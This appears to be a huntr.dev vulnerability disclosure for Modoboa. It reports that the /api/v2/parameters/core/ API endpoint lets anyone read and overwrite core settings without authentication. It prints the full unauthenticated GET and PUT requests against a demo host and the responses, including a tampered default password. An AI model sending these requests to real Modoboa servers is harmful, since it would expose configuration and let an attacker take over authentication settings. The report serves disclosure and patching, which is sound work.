Lucene search

K
huntr7h3h4ckv157351F9055-2008-4AF0-B820-01FF66678BF3
HistoryFeb 25, 2023 - 3:56 a.m.

Improper Authorization

2023-02-2503:56:00
7h3h4ckv157
www.huntr.dev
16
improper authorization
sensitive information exposure
security risk
data confidentiality
data integrity
unauthorized access

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.012 Low

EPSS

Percentile

85.1%

Description

During testing, it was observed that sending a GET request to the following endpoint: /api/v2/parameters/core/ returns sensitive information without any authentication or authorization.

Request

GET /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 0
Connection: close


Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:26:58 GMT
Content-Type: application/json
Content-Length: 1709
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en

{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}

The response contained sensitive information which could be used by an attacker to gain unauthorized access to the system.
This issue poses a significant risk to the confidentiality and integrity of the system and its users, because the information returns from the request can be modified using another PUT request.

Request

PUT /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1680
Connection: close

{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"[email protected]","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"[email protected]","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}

Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:24:46 GMT
Content-Length: 0
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en


Proof of Concept

poc1.png

poc2.png

9.1 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

6.4 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:P/A:N

0.012 Low

EPSS

Percentile

85.1%

Related for 351F9055-2008-4AF0-B820-01FF66678BF3